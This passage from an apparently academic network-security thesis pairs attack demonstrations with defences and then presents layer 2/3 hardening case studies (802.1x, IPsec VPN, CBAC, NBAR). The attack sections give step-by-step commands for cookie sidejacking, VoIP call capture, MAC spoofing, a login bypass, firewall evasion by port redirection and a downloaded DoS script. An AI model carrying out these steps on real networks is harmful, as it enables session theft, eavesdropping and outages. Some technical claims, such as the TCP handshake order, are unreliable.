
It is very easy to use a Linux or Windows based system and steal those cookies on a WAN or

LAN connection. Thus, by the time a client is checking their e-mail, an intruder can benefit from

session hijacking and can move around his email box.

To illustrate session hijacking, a windows box is used in this demonstration. First, download a

tool called Ferret and then Hamster [37]. There tools are command line and have no

graphical user interface, so make sure that each command is typed correctly.

Open the command prompt, get inside the folder and type the following command:

C:\sidejacking>ferret.exe –W

The command will list the current adapters and their numbers. Pick the correct adapter which is

going to be used in session hijacking and note down its number at the beginning of the line and

input the following command:

C:\sidejacking>ferret.exe –i <number>

Now the adapter is in listening mode and will search for all the active sessions going around the

local area network. Open a new command prompt and run hamster.

C:\sidejacking>hamster.exe

While listening, open Mozilla firefox > Tools > options > Network > Settings. Select manual

configuration and enter 127.0.0.1 in HTTP proxy and port 3128. Click OK. Type http://hamster

in the address bar and, at this stage, all the clients on local area network will be shown in the list

on the right. Click on any IP address and check the panel on the left of the browser windows,

which will show all the sessions of the targeted client. Click on any link, and the client‟s session

will be opened in the intruder‟s window.

http://hamster/


17

4.4.1 Session Hijacking Counter Attack

Most of the services, like Yahoo!, Hotmail and Gmail, offer flexibility to users to save a session

to a local computer for future retrieval without entering credentials again and again. This method

is called “cookie”. Never store cookies, they are dangerous and can let an intruder to copy the

cookies to his computer even if you are not using the particular session at the time of the

hijacking It is always recommended to use encryption and, if you do, encrypt the whole session

so that no one can sniff and understand the communication.

4.5 Copying IP telephony conversation

IP telephony mostly falls in line to the computer. That means that a cable connecting to the

switch will first be plugged into IP telephone and then from phone to computer. The benefit of

such deployment is that it reduces the number of cable connections for each port, and also saves

one extra port for the switch. The downside of this deployment is that, if the network

administrator forgets to configure them properly, the IP phone conversation could be easily

copied to computer, and played in WAV format, because the IP phone falls in line to the

computer.

4.5.1 IP telephony conversation – Attack

VOMIT [34] is used to launch an attack against an IP phone. This tools works only in Linux. Just

download, install it and run the following command to copy the conversation.

vomit -r phone.dump | waveplay -S8000 -B16 -C1

IP telephony uses CODEC [42] to digitize the packets and send them across the network. VOMIT

can only copy G.711 CODEC conversation. Also, note down that the IP phone should be in line

to computer to run this tool and the successful conversation can only be copied when the victim

ends the conversation.

4.5.2 IP telephony conversation – Counter Attack

VLANs logically divide local area network into multiple subnets. CISCO IP phone has a feature

that it can tag VLAN information to a packet, whereas a computer has no ability to tag a packet

for the switch. When an IP phone is placed in line to the computer, and they both fall on the same

VLAN, an intruder could easily copy the IP phone conversation to his computer and convert it to

wave file.

New Cisco switches support separate VLAN for voice phones. Switches protect from this attack

by introducing special VLAN for IP phones, and this is called “VOICE VLAN”. Thus, the IP

phone conversations cannot be copied because they fall on different VLANs.

4.6 MAC address spoofing

Network administrators commonly implement MAC address restrictions on the network. In this

way, only those MAC addresses are allowed to access the network whose entries are found in the

MAC address table. If an intruder connects a computer to local area network, he cannot access

the network because his MAC address will not be found in the MAC address table. An intruder

can easily overcome this restriction/limitation by spoofing his MAC address to an active MAC


18

address across the network. This process is also common in wireless network, where an

administrator assigns static MAC leases. Thus, only those clients are allowed to connect whose

MAC addresses are found in the MAC table. An intruder can overcome these hurdles by

assigning static IP address to his computer, scanning the whole subnet using namp, finding the

active hosts and spoofing the MAC address to use the network.

4.6.1 MAC address spoofing – Attack

MAC addresses spoofing can be performed in both Linux and Windows. In Linux, no special

software is needed: it can done using command line. For Windows, change it through the registry

or by using software known as Smac [45].

To spoof a MAC address in Linux, just open a command prompt and turn down the current

network adapter. Then change the MAC address and finally turn up the network adapter.

Ifconfig eth0 | wlan0 | lo0 down

Ifconfig eth0 | wlan0 | lo0 hw ether <mac-address>

Ifconfig eth0 | wlan0 | lo0 up

To change the MAC address in Windows, follow these steps.

Go to network connections and right click the adapter desired for MAC spoofing and click

properties.

Hit the General tab > Advanced > Property Section > Network Address > Local Administrator

Address.

Click on “Value”, type a new MAC address.

Restart the system.

Remember that MAC address is 48 bit long mean 12 hexadecimal numbers. For Linux, place :

after every two numbers and, – in Windows, after every two numbers.

4.6.2 MAC address spoofing – Counter Attack

MAC spoofing cannot be stopped completely, but it can be controlled. For wireless networks, if it

is a standalone access point for SOHO users, first try to implement 802.1x. 802.1x will require

authentication, so if even a MAC address is spoofed, the intruder has to authenticate.

If an access point is connected to a switch in local area environment, stop the DHCP server, stop

the MAC address binding and redirect all the users to obey switch configuration. Again, MAC

the address restriction or MAC address binding to DHCP is not an option; use a NAC server

instead.

4.7 By Passing the Login Password

In Linux and Windows, it is possible to tweak and tune the kernel core so that it can reset the

password of the current user. So the login prompt will just allow access to the operating system

without entering the current password.


19

4.7.1 Bypassing the login password – Attack

This technique does not require any special knowledge or command line configuration. It can be

done easily by downloading Kon-Boot [51] and burning it to a CD or USB. Put the USB or

CD-Rom and make sure that the booting device priority in BIOS is set up to CD-Rom or USB. At

start-up, before the Windows screen, Kon-Boot will load for a while and will change the entries

in kernel to reset the current password. After Kon-Boot is done, Windows will resume its

loading and check the start up. No password will be required.

4.7.2 By passing the login password – Counter Attack

Enter BIOS and change the boot device priority. In boot device priority, make sure that hard drive

is placed at first place and disable other levels. Secondly, put a password on BIOS so that if

someone wants to try this tool on a system, they cannot get inside the BIOS setting to change the

boot device priority levels.

4.8 Port redirection

In port redirection, an intruder tries to redirect data from one port to another port. If an

administrator has blocked certain ports inside the network, like Instant Messenger software, and

has allowed some ports like Web browsing, Email etc, then an intruder can easily redirect

Messenger data through the web or email port.

4.8.1 Port redirection – Attack

Port redirection works better in Linux, but it has Windows version too. Download rinetd [11].

Compile the file in Linux and before running it; it requires a configuration file where the port

redirection rules are specified.

Every server in this world has its own IP address. For example, Yahoo! Messenger server has an IP

address of 76.13.15.43, and it uses a TCP port 5050 to connect. If an administrator has blocked

port 5050, and has only allowed standard ports like 80, 25 or 21, then using rinetd could

tunnel Yahoo! port 5050 connection through port 80 or 25.

First create a file in /etc/ by using the following command.

Vi /etc/rinetd.conf

Note down the default gateway address and then type the following line in rinetd.conf.:

192.168.1.1 80 76.13.15.43 5050

The above rule is simple. Take the data for port 5050, desired for address 76.13.15.43, and pass it

through the default gateway through port 80. Save the file and exit to command prompt and next

type the following command to run the port redirection service:

./rinetd


20

If there is still a connectivity issue, it could be due to wrong server IP address or wrong

destination port.

4.8.2 Port redirection – Counter Attack

In order to stop intruders from port redirection, some counter measure analysis should be

considered first. If an administrator has just implemented a dump firewall where data restriction

is only related to ports, then there is no way to stop port redirection. In chapter 6, we will

implement NBAR (network based access recognition). NBAR checks the inner contents of packet

and permission or denial is based on the contents.

4.9 Denial of Service (DoS)

In a DoS attack, an intruder tries to send series of fake requests and makes the network so

overwhelmed by the requests that it can hardly cater for any other requests and thus brings the

whole network down. A DoS attack could easily be tracked and stopped, but intruders have now

moved to another step of DoS attack, called “DDoS” (Distributed Denial of Service) , attack, in

which intruder tries multiple DoS attacks and thus hits the network more severely.

4.9.1 Denial of Service (DoS) – Attack

Many scripts are available from the hackers‟ library that can aid the successful launching of DoS

attacks. This demonstration uses Perl scripting to launch DoS attacks. Make sure that Perl is has

been installed on the system before running the script. This script can work on Linux or Windows

as long as Perl is installed.

Download a sample script from [22]. Head towards the file directory and type the following

command:

Perl <filename>.pl

The terminal will prompt for host name. Enter the target and press “enter”. The terminal will

again prompt for forum; just leave that blank. Wait a minute and check the target; it will not be

accessed. To perform DDoS attacks, open many terminals and repeat the above on each terminal

to complete DDoS attack.

4.9.2 Denial of Service (DoS) – Counter Attack

In smaller deployments, use CBAC with RFC 1718 filtering on the router. CBAC inspects traffic,

creates a state table and allows return path only for those traffic which has been initiated from the

internal network. Apply stick policy at the external side, thus any uninvited traffic will be

immediately dropped. Use RFC filtering to block all the private IP addressing scheme to be

dropped immediately, if accessed from external to internal network. Also, apply login security

options on the router, which will stop intruders from launching brute force attack against

passwords attacks.

For larger deployment, use IPS. IPS checks the pattern of traffic and, if it finds some

irregular/malicious patterns in the traffic flow, it will immediately drop the packet and send

information to the management console.


21

4.10 Layer 1 Security Issues

Cisco documentation suggests placing all routers and switches, including workstations, in an

isolated and locked room. The room should only be accessed by authorized users and no one else

should be allowed to get inside the room. Provide UPS (universal power supply) to all the

devices, so that there is never a single second of downtime. The network devices produce some

heat and can operate between 0 to 40C [47], so make sure that the cooling unit is installed in

NOC (Network Operation Centre) to control thermal temperature.

Isolate cables from the user‟s access if possible because cables can be wired-tapped [52].Bridges

introduced between cables can record the whole communication. Good quality cables, like

twisted shield copper wire or fibre, should be used in order to avoid crosstalk.

Try to keep data cables away from electricity runs as they can be disturbed by the magnetic effect

produced by electricity

Use of the hub is strictly forbidden; use a switch instead. Do not use a hub. It is highly

recommended to use switch inside a network and migrate from hubs to switches, if possible.


There are many other switch related issues which a network administrator should consider while

securing a switch.

4.11.1 CAM Overflow

Every switch has a capacity to store a certain number of MAC addresses in the MAC address

table. An intruder can send fake MAC addresses to a switch and fill the capacity of MAC entries

to convert it to a hub. CAM overflow is performed by a tool known as dsniff [6]. It is

important to properly configure a switch to overcome CAM overflow. See appendix C for

configuration.

Figure 1 CAM Overflow


22

The figure shows that how an intruder can exhaust the switch CAM table through a direct, or

through a wireless, access point.

4.11.2 Root Guard

Some medium and large size Business installs multiple switches for redundancy. In multiple

switches, one switch becomes a root switch whereas all other switches forward their data. If a

switch is not configured for root guard, an intruder can plug in his own switch to make it a root

and, thus, the intruder can redirect the client‟s data to the intruder‟s desired place. See appendix D

for configuration.

4.11.3 BPDU Guard

In multiple switch environments, switches send BPDU (Bridge Protocol Data Unit) [53] to

discover the root switch. The selection of root switch is very slow because all the ports participate

in BPDU. To make this process more efficient, an administrator converts switch ports that are

connected to the client's to portfast mode for fast convergence. In portfast mode, a port is

automatically converted to forwarding mode while other ports are still in listening mode to get

BPDU. While in forwarding mode, a port still participates in BPDU and, if a switch is connected

to this port, it could take over the switch root role. It can be overcome through the BPDU guard.

See appendix E for configuration.

4.11.4 Trunk Auto-negotiation

A trunk port in a switch is a port which can carry multiple VLAN information, and uses VTP

(VLAN Trunking Protocol) to pass VLAN information between the switches. VTP reduces

administrative overheads by automatically sending VLAN updates between the switches. VLAN

configuration depends on a VLAN revision number; if a switch receives a VLAN revision

number that is higher than the one it owns, it will automatically replace the old configuration with

a new one. VTP can only work on trunk port and, by default, all the ports are in Auto state, which

means that if a switch, is connected a port, it will turn to a trunk and, if a client is connected, it

will convert itself to access mode. If an intruder attaches a switch to a port and the port is in auto

mode, then the intruder can not only take over the root role, but can also wipe out the VTP

information and inject its own information. See appendix F for configuration.

4.11.5 VLAN Hopping

VLAN hopping occurs where a switch port is configured for Dynamic Trucking Protocol (DTP).

An attacker uses two modes to perform VLAN hopping. The first attack is switch spoofing,

described in the section above. Another is double tagging. In double tagging, an attacker

encapsulates double tag on a packet. One packet is for the switch to which the intruder is attached

and using the second tag to forward the frame to the victim through the switch. This kind of

technique intruders uses to jump the VLAN information means that he sends a data from one

VLAN and show that this data is from other VLAN. VLAN hopping is very dangerous and could

corrupt, delete or modify data at end computer. Another effect of VLAN hopping is to spread

trojans, worms, viruses and other malicious software across the network. To prevent VLAN

hopping, just disable auto negotiation and never use default VLANs on any port.


23

4.11.6 Wireless Bridge

In wireless networks, if an administrator wants to install multiple access points at certain

locations to improve signal quality, then he can achieve this by either connecting the access

points through cables or through bridging. Bridges eliminate cable-to-cable extension and use the

wireless signal to connect to each other. While implementing a wireless bridge, the administrator

should make sure that the device only bridges between authorized devices and should disable

connecting all options.

Figure 2 : Wireless Bridge

4.11.7 DHCP Spoofing

DHCP (Dynamic Host Control Protocol) is a protocol used to solve administrator over head by

assigning automatic IPs to the client. The organization installs a specialized box like Windows

2003, 2008 server for automatic assignment of IPs to the client. If the switch has not been

configured properly to protect against DHCP spoofing, an intruder can plug in his own DHCP

server and start assigning IP‟s to the clients from his own server. It can benefit the intruder to

perform man- in-the-middle attack, trust exploitation or cause network outage. Stopping an

Intruder from performing this attack is called DHCP snooping. See appendix G for configuration.


24

Figure 3: Root Guard / BPDU Guard / DHCP Snooping


The router is the first device that is attacked from the external, as well as from the internal,

network. This section will explore these attacks and their mitigation.

4.12.1 TCP SYN Flooding

TCP (Transmission Control Protocol) is a connection oriented protocol which utilizes three way

handshakes to create a session for data flow. At first, the initiator sends SYN, the other side

responds with ACK and, finally, the initiator sends SYN+ACK to establish a TCP session. In

TCP SYN flooding, an intruder never sends final SYN+ACK and, thus, opens a half open TCP

session. If too many TCP sessions are open, then the router cannot maintain new requests unless

the old ones are satisfied. Since an intruder‟s goal is to attack the network, the old, half-opened

session is never closed by him, resulting in network outage. Hping2 [46] is used to perform TCP

flooding. See Appendix h for configuration.

4.12.2 Ping of Death Attack

The maximum packet size that a router can handle is 65535 bytes. When the packet goes larger

than 65535 bytes the receiver starts fragmenting it and, thus, the victim is unable to reassemble it

and so, as a result, the system crashes. There are certain scripts available that perform ping of

death [12]. Run the script through C compiler and launch the attack to victim through the default

gateway. Make sure that router does not allow packets-too-big across the interface.


25

4.12.3 Packet Sniffing

By applying security with loopholes, it is possible for an intruder to sniff the whole, ongoing

communication and steal sensitive data. It may be that a user sitting inside the network, or even

the external network, can gather data with little or no technical skills. Tools such as [21] [26]

requires no expert knowledge for packet sniffing. To control packet sniffing on the network, it is

recommended to encrypt whole data. With encryption, an intruder can get the data but can never

read or temper the data.

4.12.4 RIP Attack

RIP (Routing Information Protocol) is a distance vector protocol developed in earlier 1960‟s to

distribute routing information between routers. RIP has two versions. Version 1 has a big security

issue and it sends the information in clear text and does not support authentication. With no

authentication support, it is possible for an intruder to sabotage its peer about best hop

information. RIP uses best hop to reach to the destination network and that is the lowest number

of routers between the destination networks. Since no authentication is supported, an intruder can

peer his router and change the best hop information from the real one to the fake one. In this way,

the intruder will redirect the data to his desired destination. To mitigate this issue, use RIPv2.

RIPv2 will force its peer to authenticate before the routing information is exchanged. Thus, an

intruder would never authenticate due to the unavailability of credentials.

4.12.5 IP Spoofing

Private IP addresses are not allowed to be routed across the internet. Since the organizations uses

private IP addresses schemes inside their network, an intruder can spoof an IP packet from

outside the network to enter the network. Make sure that private IP addresses are blocked from

outside the network.

4.12.6 Brute Force Attack

In a brute force attack, an intruder tries every combination of characters to get the actual

password. The router should be properly configured for login methods so that it can detect and

defend against the brute force attacks. See Appendix H for the configuration.

The table below summarizes the tools, the platforms on which they can be used and the type of

attack and the corresponding defensive strategy.


26

5 Case Study 1: Implementing Layer 2 Security It is the question of common consideration that how an organization can protect itself from

security attacks. According to a study, threats originating from inside the network are ten times

more lethal than those from outside. i.e the Internet.

How to plan and consider issues related to layer 2 depends on how large we want to deploy our

network. If a company wants 99% of up time, it needs to install redundant connections and

devices to make sure if one device or link fails the other can continue smooth operation. For the

demonstration of layer 2 security, a case study to achieve a good security practice is presented in

the diagram below.

Figure 4: Case Study related to Layer 2 securities

The above diagram has 3 layer 2 switches. These switches are connected together for redundancy.

Similarly, a wireless access point has been installed to demonstrate what best practices are

available for this wireless device.

MAC address spoofing is common in internal networks. An administrator configures a switch to

allow certain MAC addresses, thus automatically denying those MAC addresses which are not

found in the switch MAC table. An administrator also binds static leases in the DHCP server in

which allowed MAC addresses will get IP, while denying those which could not be found.

Bypassing this security measurement is a two minute process. To mitigate such security threats, a

NAC (Network Admission Control) has been implemented, which takes network security one


27

step further and allows or denies access based on the user‟s credentials and finally, a voice over

IP network attack (Note: configuring voice over IP network is not covered in this thesis).

5.1 Planning the network

Before the real implementation of the network begins it is important to consider the following

step:

Lock down all the devices in a separate room from unauthorized access.

Isolate the cables and mark them properly so that it is easy during troubleshooting.

Apply update patches to all PCs and workstations. Install latest antivirus.

Limit CPU usage per port (Appendix K).

Enable RSTP (Rapid Spanning Tree Protocol) on all switches (Appendix I).

Manually configure trunks and access port. Double check that no port is left in auto

desirable mode.

Enable portfast for all access ports.

Only switch to switch ports should be configured as trunk. Other ports should be access.

For management purposes, configure VLAN other then default (VLAN 1).

Enable DHCP snooping. Trunks and real DHCP port should be marked as trusted.

Enable root guard on all access ports.

Enable BPDU guard on all access ports.

Limit maximum number of MAC addresses per port.

Place all the PCs in access VLAN. All the IP telephony services should be placed in voice

VLAN (Appendix J).

Most important: isolate the access point(s) from users reach. Otherwise the access point

could be easily reset to factory default.

Configure strong password on access point. At least, 25 characters or above. Do not use

any dictionary word (e.g. R!d3cu!0us is bad word). Use a password with no meaning.

Use numbers, letters, small caps, bigger caps, punctuations and special characters.

The access point should be configured for its own 802.1x configuration. The switch port

attached to the wireless access point cannot participate in 802.1x activity. It should use its

own implementation of 802.1x but the DHCP server should be off and all the users must

get their IP addresses from the DHCP server attached to the switch.

5.2 CISCO IBNS (Identity Based Network Service) / NAC (Network Admission Control) /

802.1x

So far, the most common way of implementing layer 2 security is using VLAN. In VLAN,

security is tied to the physical port and thus binding certain groups to a specific VLAN. 80 to 90

percent of small to medium size businesses still rely on securing access through MAC addresses

but, in many cases, these two methods are still considered to be weak. Now it is difficult to bind

permanently one PC to one specific VLAN through MAC addresses. A port can be changed or a


28

MAC can be spoofed. Now, in order to solve this problem, CISCO IBNS has a role to play. It

offers layer 2 security on the basis of users rather than port or MAC addresses.

A lot of confusion exists about 802.1x. Many ways people refer it to a new mechanism of

connecting to wireless networks. 802.1x is implementing EAP (Extended Authentication

Protocol) over LAN (the LAN could be wired or wireless) , commonly known as “EAPOL” (EAP

over LAN). 802.1x was the first method that implemented EAP (Extended Authentication

Protocol) over Local Area Network on both wired and wireless network. The Cisco method of

implementing 802.1x is called “IBNS”, while the other method of implementing 802.1x is called

“NAC”.

EAP:

Provides more than just user based authentication (usernames / passwords, certificates,

thumb prints, retina scan etc).

Allows RAS sever to get out of the process (router, switch are not involved in

authentication).

Rides top of other protocols (PPP, radius, tacac+ etc).

5.2.1 Players involved in 802.1x

There are mainly three devices that are involved in the process of 802.1x.

Supplicant (client): This is an end user who will connect to the network. It is important

that a client PC should support 802.1x compliance cards. Some older operating systems

have no support in drivers (Windows 98, Windows 2000) to connect to 802.1x network.

Authentication server: this is the server, which will be checking user‟s credentials.

Authenticator: this is a switch or wireless access point, which will be taking an EAP

packet from the supplicant and passing it to the authentication server.

Whenever a client wants to associate with the network, the default behaviour of the switch port is

in unauthorized state. As soon as the client provides its credential to the authenticator, which is

usually a switch or wireless access point, it will send an EAPOL packet to the client asking “who

are you”. The client will pass the request with the EAP frame saying”This is who i am”. The

switch will simply forward the request to the server and, as the server gets the request, it will send

a challenge to the client to verify. The challenge is responded to and, if accepted, the server

responds to the switch with “accept” or “reject” and thus the switch puts the port in authorized

state.


29

Figure 5: 802.1x authentication process

5.2.2 Flavors of EAP

The kind of packet flowing between devices is EAP.EAP is nothing more than an empty shell.

Inside of it is a type of authentication protocol that a client and server must agree upon. A switch

can only follow EAP; no other authentication is required. Below are the types of EAP

authentication.

Cisco LEAP (lightweight EAP): this was the first authentication protocol that was

intended for EAP. It is propriety and is not implemented now days because it is vulnerable

to dictionary attacks [38].

EAP-Fast: Due to the problems found in Cisco LEAP, Cisco followed industry standards,

known as EAP-FAST. EAP-FAST was widely appreciated because it solved the flaws

that were found in LEAP and it uses cryptographic elements to protect the

communication. For more about EAP-FAST read [55].

Cisco / Microsoft PEAP (Protected EAP): by the time LEAP was considered to be weak,

EAP-FAST was in its draft phase and, hence, Cisco was unable to deploy it fully. Thus,

Cisco and Microsoft worked together to develop their own protocol. Microsoft PEAP is

already shipped with Windows boxes, so the client has nothing to configure from their

part and they refer to it as MSCHAPv2. The difference between Cisco and Microsoft

PEAP is that, with Cisco PEAP, a client has to install an extra driver on their disposal to

support this version and support only one time password for authentication [56].


30

5.2.3 Limitations

Prior to starting configuration of 802.1x, it is important to note that 802.1x cannot be enabled on

the following ports.

SPAN (Switch Port Analyzer): an administrator converts a switch port to a hub for

IPS/IDS implementation, So all the communication can be sniffed by the administrator for

security purposes.

Trunk ports: trunk ports carry data from any VLAN. Trunk ports cannot be enabled for

802.1x implementation.

Dynamic ports: these are ports where the switch will detect the end user device and

converts the functionality of the switch accordingly. All the ports should be hardcoded to

access mode, while implementing 802.1x.

EtherChannel ports: these ports are used by an administrator for aggregation. 802.1x will

not work on EtherChannel ports.

Secure ports: is used if a port has been enabled for port-security. 802.1x cannot be enabled

on this port. In this configuration, disable port security because 802.1x will not work if the

port has been enabled for port-security.

5.3 Implementing 802.1x

So far, the whole discussion is about NAC/IBNS/802.1x. It is important to note that 802.1x is

only a mechanism to authenticate users. It will either permit or deny users based on their valid

credentials. Install internet authentication services (AAA) using RADIUS server. It will specify

the users, which will be allowed to authenticate based either as a single or a group of users. See

Microsoft documentation for more information [57]. Configuration of AAA is important to make

sure that a valid policy and clients have been configured properly. After the server has been

configured, next step is to configure switch to allow client for 802.1x authentication (Appendix

H). The last step is configuring client. Click on the network adapter, which is going to participate

in 802.1x authentication and enable 802.1 x checkbox from properties. Enable 802.1 x

authentications and make sure that PEAP has been selected.

5.4 Results of Implementing 802.1x

After implementing 802.1x on LAN ,a valid user whose credentials existed on windows 2003

server were tried along with a an invalid user not created on the windows box. In the figure

above, an intruder is the one with no valid identity. Both the users were tested and the port

attached to intruder PC went to an unauthorized status. It means that intruder port is blocked and

he is no longer capable of accessing the network.

An interesting point here is that what if a valid user plays the role of an intruder who would want

to harm the system. In such case if the user tries to perform CAM overflow then the port will still

move to unauthorized state. Here is how it happens; the switch in the first place accepted the user

based on his original MAC address. Since the user after a while tired to overflow the MAC table


31

by sending false MAC addresses, the switch cannot find a new match of the fake addresses to

username; hence the port is moved to unauthorized state.

Packet sniffing was performed on an authorized user along with man-in-the-middle attack

launched. 802.1x trusts that any valid user is a user not an intruder but the question is that how

much we trust? We can never trust and in order to create one more safe guard against a man in

the middle attack, the next demonstration explain avoiding man in the middle attack in this

scenario.

5.5 Securing data through VPN

Since the above implementation cannot provide a protection against packet sniffing. Packet

sniffing, session hijacking can be avoided by encrypting the data. This demonstration will briefly

explain how to build VPN between a client and server, so that the data is transmitted securely.

There is no need to install an extra operating system or software to complete this task. For the

scenario above follow the following steps to create SSL VPN.

In network connection, click on create new connection.

Click next and select setup advance connection.

Select allow incoming connection and click next.

Since the connection is dialing through LAN, so click next.

Select allow virtual private network.

Select or create new users, who will be allowed to create a VPN connection through this

server.

Select services that this severs will offer.

Click finish.

Now the server is ready for VPN connection. A client should also be set in order to connect to

VPN server. Following the steps will set up the VPN connection from client side.

In network connection, click on create new connection.

Select connect to network at my workplace and click next.

Select Virtual private network.

Enter a user friendly name for this connection and click next.

Enter the host name or IP address. In this case IP address of windows 2003 server.

Select create a shortcut on Desktop and Click finish.

Now both client and server have been set to establish a virtual private network and transfer the

data securely. Since the VPN has been deployed on windows 2003 box, so the encryption scheme

will follow MSCHAPv2 [43] and all the packets will be encrypted using PEAP MSCHAPv2. It is

also possible to deploy more robust and feature rich solution like Open VPN [13]. It is simpler to

use and reduces administrator over head by providing the flexibility to control the whole server

through web GUI.


32

6 Case Study 2: Implementing Layer 3 Security Before the discussion and implementation of layer 3 begins, it is important to see the CISCO

strategy of defence in depth (DID) [8]. It is a model suggested by CISCO, which provides the

defence mechanism in layers. The next section will brief about DID and its structure.

6.1 Cisco Strategy for network defence

Cisco suggested a defence in depth (DID) strategy that utilizes security approach in layers. DID is

not something to be bought as a set of security devices but rather can be implemented by

combining several devices that will contribute to security from layer to layer.

There are many devices that can contribute in a DID structure. In the figure below, each device

provides its own security measures but up to certain limitations. For example, Cisco ASA

(Adaptive Security Appliance) is good for VPN termination point, deep packet inspection etc, but

cannot check the contents of an encrypted packet. If an encrypted packet has some sort of

malicious content, then DID goes beyond that and NIPS (network intrusion prevention system)

that are constantly inspecting traffic. NIPS will try to catch and block them and then report to the

administration about this incident. The layer approach then moves to another step and now the

hosts also participate in the security work. A Cisco security agent is installed on each system and,

thus, anything that is malicious and has been passed from NIPS and ASA would be then

inspected by HIPS.

Figure 6: Cisco Defense in Depth (DID)

It is always recommended that the management data should be separated from ordinary network

traffic. In the figure above, OOB (Out of Band Management) addresses this fact. OOB

implementation is important because, if the network is somehow compromised, then the network

administrator will have his own path to reach and check for possible network faults. Contrary to


33

that approach, in-band management is used where network and management data flows on the

same line. OOB implementation is ideal for larger implementations because it is expensive to

dedicate separate paths. For medium to lower sized business solutions it is fine enough to

implement in-band management since it will keep down the implementation expenses.

6.2 Implementing Layer 3 Security

This case study explicitly deals with the attacks and mitigation that are performed from the

outside of the network. These attacks are very difficult and more generic in nature and an attacker

for this reason requires more knowledge and brief analysis to make his work successful. Before

the demonstration begin, the following diagram will help in understanding of security plan.

Figure 7: Layer 3 security scenario

In the scenario above, an intruder has been placed in the commutation between Branch office and

Head Quarter so that he/she is able to sniff all the data passing between the two sites. An intruder

can get all packets but will not be able read or modify it. Next section will heavily focus on

encryption mechanism along with avoiding IP Spoofing attacks, DoS and DDoS attacks, Port

redirection and managing internet access through Easy VPN Server.

6.3 Building Site to Site Virtual Private Network (VPN)

VPN is a way of building a private network over a public network. Traditional way of connecting

two sites is either difficult or expensive. VPN provides a way of building private network tunnel

over a public network. Furthermore IPSEC VPN is one inexpensive of utilizing the VPN

technology plus offering security. In this case study, first step is to secure data between branch

office and head quarter. The communication is most likely to be sniffed but for a network admin

it is a challenge to provide security.


34

Before setting up the lab and analysing the results before and after the VPN is setup, a brief

review about IPSEC is important. IPSec is a chunk of protocol suits that provide data

authentication, integrity and confidentially across the network. In this way, when two sites want

to transfer data they will be required to authenticate themselves before the transmission begin.

This authentication is done by either using a pre-shared key or using digital certificates. When the

authentication is successful, the sender party encrypts data using DES, 3DES, AES [44]

encryption algorithm to maintain its confidentiality and hashes the data using md5 or SHA1

algorithm to protect it from tempering. In this way, the original payload along with port

information and original source and destination address is encrypted and new header information

is placed in the front of encrypted data.

From the Branch office, we will telnet to Head office. An intruder will catch all the

communication between and we will analyze what an intruder has sniffed before encryption. For

the sake of demonstration, we have used telnet which is not recommended but for the lab

environment it is fine to show data in clear text. Check the image below, the following data was

retrieved.

Figure 8: Sniffing data across the network using wireshark without security

In the figure above, the telnet data was sent across the network in clear text and as a result the

passwords can be seen in the image above.

Now it is the time to protect the data. IPSec has been implemented between branch and head

office and the following results were obtained after sniffing the packets.


35

Figure 9 Sniffing data across the network using wireshark with security.

Since the packets were sent encrypted, the packet sniffer was not able to retrieve the information.

Looking the figure above, no information about the telnet communication is present. At this

stage, an intruder has no idea what type of data is going across the network.

6.4 Implementing Classical firewalls / CBACS

DoS and DDoS attacks are very specific in nature and if successful, it can cause immediate

network outage or hurting routers CPU cycles. One way an intruder can perform this task is to

spoof a private address, which an internal network would trust or can even hijack TCP sequence

number and can inject his own packets to perform this job.

DoS and DDoS attacks should be taken seriously by the network administrator and should

implement proper counter measure before they happen. How CBAC/Classical firewall helps in

mitigating DoS and DDoS attacks is discussed below.

When a router is configured with CBACS, an administrator inspects the data that is initiated from

inside to reach outside network. So when the data passes inspection rule will only be allowed to

return back and anything that is uninvited will be blocked.

In this demonstration, users from branch office will be able to telnet head office but head office

will not be able to telnet back to branch office. In normal practice, when the two sites have

connectivity they both should be able to ping each other but after implementing CBAC only the

traffic that was generated by Branch office can find its way back, in our case, we did get the ping

reply as it was initiated from the Branch site. These two sites will have connectivity but

inspection rule will not allow head office to reach branch office. See appendix B for

configuration.

6.4.1 Results

Looking at the figure below, the following results were obtained.


36

Figure 10 Results from CBAC configuration

Looking at the figures above, first Branch office tried to ping and then telnet in Head office and it

was successful. In the figure below, head office tried to ping and telnet into branch office and the

results were unsuccessful.

6.5 Implementing Network Based Access Recognition (NBAR)

NBAR was first introduced as a tool for Quality of Service (QOS) but now is always making its

way in security as well. As discussed in chapter 3 that it is now difficult to block or allow access

on the basis of ports. Applications like kazza2, nepster, bittorrent etc uses dynamic ports and has

the ability to find open ports around even kazza2 can scan for the active ports and can tunnel their

way through port 80. Many applications are reprogrammed and can start with highest port in the

network lowering down to best possible port that it could tunnel.

NBAR does not rely on ports but what really NBAR does is that it will look inside the contents of

each packet and will allow or deny packets based on its contents. Now certain p2p applications

discussed above could tunnel their data through other ports but with the implementation of

NBAR, the access will simply be denied.

In the demonstration of NBAR, we will use bittorrent client to download certain p2p applications

from the internet. The router has been configured to only allow port 80 and 443 and denies all

other traffic. We have downloaded a bittorrent client and changed its port to 80 to tunnel its data

through port 80. At first, we want to check the functionality without NBAR and want to check

that how tunnel actually works.

6.5.1 Results

The client port was changed to standard port of http (80) and it was successful to tunnel its traffic

through that port.


37

Figure 11: Tunnel p2p traffic through port 80 before NBAR

It can be seen from above picture that a client is still able to download the data even there are

only two ports allowed for inside users. So it is clear that stopping the traffic through port is not a

solution. Packet inspection is necessary. Next step is to configure NBAR (Appendix L) and then

check the results.

Figure 12: Tunnel p2p traffic through port 80 after NBAR.

Using the same file and same tunnel port after implementing NBAR stopped the p2p traffic

because NBAR has been implemented and in the configuration, all p2p traffic has been set to

drop.


38

6.6 Implementing Cisco Easy VPN Server

In the demonstration of site to site VPN connections, two sites BO and HQ were transferring data

using encryption and while an intruder was able to sniff but not able to understand the real

contents. Using CBAC, DoS and DDoS attacks were also mitigated. Now BO and HQ can

communicate with each other and communication from outside of the network is totally

forbidden.

Head quarter users have also an access to the internet. Since branch office users is allowed to

enter inside head quarter, so it is also possible for branch office users to browse the internet. Head

quarter wants to restrict this access and only allows certain users to access the internet. In normal

condition both sites can transfer data securely using site-to-site VPN but if any client wants to

access the internet Easy VPN server can restrict them and can only be allowed if they provide

valid username and password.

Before implementing easy VPN, an important question arises that how can client connect to VPN

server? This can be done by installing Cisco Easy VPN Client and can be downloaded from

Cisco‟ site.

Head office will act as Easy VPN server and clients from head office and branch office will use

Easy VPN client to connect to the internet. Check appendix M for details.

The interface pointing towards the internet was configured to deny all the traffic from any source

to any destination. A local pool was created and only address from this pool will be allowed to

forward traffic through this interface. Clients on branch and head office can forward traffic

between each other but if they try to open a web browser or anything else so their request cannot

